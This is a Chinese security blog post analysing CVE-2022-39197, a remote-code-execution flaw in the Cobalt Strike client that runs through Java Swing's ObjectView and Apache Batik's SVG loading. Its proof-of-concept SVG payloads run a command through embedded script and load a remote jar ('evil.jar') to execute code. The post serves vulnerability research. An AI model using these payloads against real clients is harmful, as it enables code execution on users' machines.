CobaltStrike CVE-2022-39197 漏洞分析

CobaltStrike 作为流行的cs控制工具,当CVE-2022-39197 公布后,居然可以RCE ,这对红蓝双方带来的影响自然不言而喻。

0x01 背景

这个漏洞可能是继Spring4Shell 之后的又一Java 🔥漏洞。漏洞是由beichen 师傅发现的,然后java小王子浅蓝师傅没过多久就卷出来了,接着pandan师傅、漂亮鼠师傅陆续都复现了,直到整个java安全圈都有在分析这个漏洞。

这个漏洞是很值得分析的:

  • CobaltStrike RCE,这个不用多说,攻防互换,每一种反制手段都极其罕见
  • 是Java Swing GUI 的漏洞,GUI 的RCE 凤毛麟角,很是珍贵
  • 是通用漏洞,比如 CobaltStrike 用到的Apache bakit
  • 据说beichen有jdk的链,期待

赛博群名言:只要知道有洞,就会被群友卷出来。

知道有漏洞,再去定向分析,已经是开卷考试了。但是分析过程仍然坎坷、复杂,因此对beichen 师傅认真膜一个,能从一个set点坚持找到对应的利用链,真的是很需要耐心和细心。

0x02 漏洞分析

本文这里只做漏洞原理分析,并不像以往进行思路分析,只是从source、sink、gadget 去复现该漏洞,暂不解释各自的发现思路。

2.1 Source: ObjectView

这里参考【1】中漂亮鼠师傅详细讲解了ObjectView,这里不赘述

javax.swing.text.html.ObjectView

1
2
3
4
5
6
7
8
9
10
11
12
13
14
protected Component createComponent() {
    AttributeSet attr = getElement().getAttributes();
    String classname = (String) attr.getAttribute(HTML.Attribute.CLASSID);
    try {
        ReflectUtil.checkPackageAccess(classname);
        Class c = Class.forName(classname, true,Thread.currentThread().
                                getContextClassLoader());
        Object o = c.newInstance();
        if (o instanceof Component) {
            Component comp = (Component) o;
            setParameters(comp, attr);
            return comp;
        }
}

直接引用结论:

  1. classid传入需要实例化的类,类必须继承与Component
  2. 必须有无参构造方法,貌似是因为newinstant是调用的无参构造方法
  3. 必须存在一个setXXX方法的XXX属性
  4. setXXX方法的传参数必须是接受一个string类型的参数

2.2 查找Component

1
2
3
match PATH=(m:Method)-[r2:HAS]-(source:Class)-[r:EXTENDS*]-(sink:Class {NAME:"java.awt.Component"})
where m.NAME =~ "set.*" and m.PARAMETER_SIZE=1 and m.SIGNATURE =~ ".*String.*"
return m.CLASSNAME,m.NAME,m.SIGNATURE

upload successful

没啥技巧,只能一个个尝试,了解原理一个个排除。

这里先暂时直接给结论,org.apache.batik.swing.JSVGCanvas#setURI可以。

有师傅们也给了codeql的搜索条件:
upload successful

2.3 Sink

粗略跟跟setURI

JSVGCanvas#setURI

1
2
3
4
5
6
// public class JSVGCanvas extends JSVGComponent
  public void setURI(String paramString) {
    String str = this.uri;
    this.uri = paramString;
    if (this.uri != null) {
      loadSVGDocument(this.uri);

AbstractJSVGComponent#loadSVGDocument

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
//public class AbstractJSVGComponent extends JGVTComponent 

  public void loadSVGDocument(String paramString) {
  String str = null;
  if (this.svgDocument != null)
    str = this.svgDocument.getURL(); 
  ParsedURL parsedURL = new ParsedURL(str, paramString);
  stopThenRun(new Runnable(this, parsedURL) {
        private final ParsedURL val$newURI;
        
        private final AbstractJSVGComponent this$0;
        
        public void run() {
          String str = this.val$newURI.toString();
          this.this$0.fragmentIdentifier = this.val$newURI.getRef();
          this.this$0.loader = new DocumentLoader(this.this$0.userAgent);
          this.this$0.nextDocumentLoader = new SVGDocumentLoader(str, this.this$0.loader);
          this.this$0.nextDocumentLoader.setPriority(1);
          Iterator iterator = this.this$0.svgDocumentLoaderListeners.iterator();
          while (iterator.hasNext())
            this.this$0.nextDocumentLoader.addSVGDocumentLoaderListener(iterator.next()); 
          this.this$0.startDocumentLoader();
        }
      });
}

SVGDocumentLoader#run

1
2
3
4
5
6
7
8
9
10
//public class SVGDocumentLoader extends HaltingThread
  public void run() {
  SVGDocumentLoaderEvent sVGDocumentLoaderEvent = new SVGDocumentLoaderEvent(this, null);
  try {
    fireEvent(startedDispatcher, sVGDocumentLoaderEvent);
    if (isHalted()) {
      fireEvent(cancelledDispatcher, sVGDocumentLoaderEvent);
      return;
    } 
    SVGDocument sVGDocument = (SVGDocument)this.loader.loadDocument(this.url);

DocumentLoader#loadDocument

1
2
3
4
5
6
7
8
//public class DocumentLoader {
  public Document loadDocument(String paramString) throws IOException {
    Document document = checkCache(paramString);
    if (document != null)
      return document; 
    SVGDocument sVGDocument = this.documentFactory.createSVGDocument(paramString);
    DocumentDescriptor documentDescriptor = this.documentFactory.getDocumentDescriptor();
    DocumentState documentState = new DocumentState(this, paramString, (Document)sVGDocument, documentDescriptor);

然后找到不多的几个实现类,SAXSVGDocumentFactory#createSVGDocument,大致功能为load svg file。

2.4 SVG Script

那么接下来就看看svg有哪些标签可用,参考【2】中可以发现,svg支持script,bakit的具体实现上支持rhino和jar,那么构造对应的poc即可。

1
2
3
4
5
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
    <script type="text/ecmascript">
        java.lang.Runtime.getRuntime().exec('open -a calculator');
    </script>
</svg>

注意:

  1. 该poc不能直接打cs,因为cs中默认不含rhino
1
2
3
4
5
6
<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     version="1.0">
    <script type="application/java-archive" xlink:href="http://127.0.0.1:8080/evil.jar"/>
    <text>Static text ...</text>
</svg>

注意:

  1. Manifest 中需要指定SVG-Handler-Class: com.m0d9.sec.SVGHandler
  2. xlink:href
  3. implements EventListenerInitializer 实现handleEvent。

upload successful

调用栈:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
exec:347, Runtime (java.lang)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invoke:138, MemberBox (org.mozilla.javascript)
call:226, NativeJavaMethod (org.mozilla.javascript)
call1:45, OptRuntime (org.mozilla.javascript.optimizer)
_c_script_0:4, Inline__script__http___127_0_0_1_8080_poc_rhino_svg_2_2 (org.mozilla.javascript.gen)
call:-1, Inline__script__http___127_0_0_1_8080_poc_rhino_svg_2_2 (org.mozilla.javascript.gen)
doTopCall:412, ContextFactory (org.mozilla.javascript)
doTopCall:3545, ScriptRuntime (org.mozilla.javascript)
call:-1, Inline__script__http___127_0_0_1_8080_poc_rhino_svg_2_2 (org.mozilla.javascript.gen)
exec:-1, Inline__script__http___127_0_0_1_8080_poc_rhino_svg_2_2 (org.mozilla.javascript.gen)
evaluateReader:1303, Context (org.mozilla.javascript)
run:-1, RhinoInterpreter$2 (org.apache.batik.script.rhino)
call:559, Context (org.mozilla.javascript)
call:522, ContextFactory (org.mozilla.javascript)
evaluate:-1, RhinoInterpreter (org.apache.batik.script.rhino)
loadScripts:-1, BaseScriptingEnvironment (org.apache.batik.bridge)
dispatchSVGLoadEvent:-1, UpdateManager (org.apache.batik.bridge)
dispatchSVGLoadEvent:-1, UpdateManager (org.apache.batik.bridge)
run:-1, SVGLoadEventDispatcher (org.apache.batik.swing.svg)

0x03 小结

这个漏洞是高难度的,能发现真的很厉害,漏洞本身危害也不小,算得上是Swing 的一个攻击面了。pyn3rd师傅提供的参考【4】中,其实很早就有关swing xss的风险,这个漏洞提供了新的RCE 攻击方式。

Component 的查找可以做到自动化,codeql/tabby 都能做,但是这一步只能算整个漏洞的1/2,剩下的sink点以及后半段gadget,因为涉及到GUI及异步框架,从调用链中也可以看到,目前无法自动化。

Java 安全真心卷。

0x04 参考

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true